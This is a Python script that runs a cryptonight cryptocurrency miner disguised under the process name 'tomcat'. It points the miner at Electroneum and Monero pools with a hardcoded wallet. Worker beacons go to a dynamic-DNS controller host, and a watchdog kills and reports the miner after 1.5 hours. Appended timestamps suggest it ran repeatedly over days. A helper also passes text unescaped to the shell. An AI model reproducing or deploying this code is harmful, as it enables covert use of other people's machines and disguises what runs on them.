import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:02.066306
#2018-02-17 16:31:06.396818
#2018-02-17 18:18:03.610672
#2018-02-17 20:06:07.857578
#2018-02-17 21:54:03.945629
#2018-02-17 23:39:07.022066
#2018-02-18 01:28:04.662691
#2018-02-18 03:15:03.896695
#2018-02-18 05:03:07.346750
#2018-02-18 06:54:03.620223
#2018-02-18 08:42:06.014603
#2018-02-18 10:28:07.384150
#2018-02-18 12:14:01.718232
#2018-02-18 14:01:06.659440
#2018-02-18 15:51:05.617719
#2018-02-18 17:41:01.495136
#2018-02-18 19:28:05.083308
#2018-02-18 21:13:07.054853
#2018-02-18 23:02:07.307339
#2018-02-19 00:50:06.783663
#2018-02-19 02:37:04.338860
#2018-02-19 04:23:06.466057
#2018-02-19 06:08:02.142936
#2018-02-19 07:56:05.604884
#2018-02-19 09:48:02.184911
#2018-02-19 11:36:10.013248
#2018-02-19 13:23:06.316418
#2018-02-19 15:10:09.564946
#2018-02-19 16:59:07.259304
#2018-02-19 18:46:08.997109
#2018-02-19 20:34:07.578908
#2018-02-19 22:22:01.388344
#2018-02-20 00:07:04.106519
#2018-02-20 01:53:04.290021
#2018-02-20 03:42:02.665090
#2018-02-20 05:28:07.472974
#2018-02-20 07:13:01.576825
#2018-02-20 08:58:06.557518
#2018-02-20 10:42:08.120886
#2018-02-20 12:28:04.158093
#2018-02-20 14:15:12.049042
#2018-02-20 15:58:01.459197
#2018-02-20 17:44:10.979274
#2018-02-20 19:36:09.801087
#2018-02-20 21:23:01.607108
#2018-02-20 23:07:05.209446
#2018-02-21 00:50:01.532475
#2018-02-21 02:35:05.545022
#2018-02-21 04:23:05.902414
#2018-02-21 06:09:07.063213
#2018-02-21 07:56:04.637344
#2018-02-21 09:41:05.794549
#2018-02-21 11:29:07.388186
#2018-02-21 13:18:05.824886
#2018-02-21 15:03:07.973072
#2018-02-21 16:53:10.566666
#2018-02-21 18:42:09.767103
#2018-02-21 20:26:06.214665
#2018-02-21 22:16:01.924903
#2018-02-22 00:05:08.676592
#2018-02-22 01:53:04.603059
#2018-02-22 03:40:07.054124
#2018-02-22 05:27:01.784501
#2018-02-22 07:12:05.756194
#2018-02-22 08:59:05.204503
#2018-02-22 10:47:10.226975
#2018-02-22 12:33:07.680049
#2018-02-22 14:18:04.130913
#2018-02-22 16:07:04.442409
#2018-02-22 17:53:04.326886
#2018-02-22 19:39:08.007053
#2018-02-22 21:30:08.522090
#2018-02-22 23:17:03.535512
#2018-02-23 01:04:05.934095
#2018-02-23 02:52:01.395843
#2018-02-23 04:39:01.683105
#2018-02-23 06:25:09.744610
#2018-02-23 08:14:06.656933
#2018-02-23 10:31:05.564646
#2018-02-23 12:23:05.462194
#2018-02-23 14:11:06.326557
#2018-02-23 16:01:08.215615
#2018-02-23 17:46:09.538386
#2018-02-23 19:34:07.111991
#2018-02-23 21:17:05.834082
#2018-02-23 23:04:06.116585
#2018-02-24 00:49:04.398094
#2018-02-24 02:42:05.295501
#2018-02-24 04:36:05.068873
#2018-02-24 06:20:08.202329
#2018-02-24 08:08:06.999773
#2018-02-24 09:53:01.998990
#2018-02-24 11:47:04.934224
#2018-02-24 13:38:01.268749
#2018-02-24 15:25:03.100314
#2018-02-24 17:15:07.793480
#2018-02-24 19:08:05.009482
#2018-02-24 20:57:05.620530
#2018-02-24 23:24:03.538677
#2018-02-25 02:48:07.180927
#2018-02-25 06:25:04.486841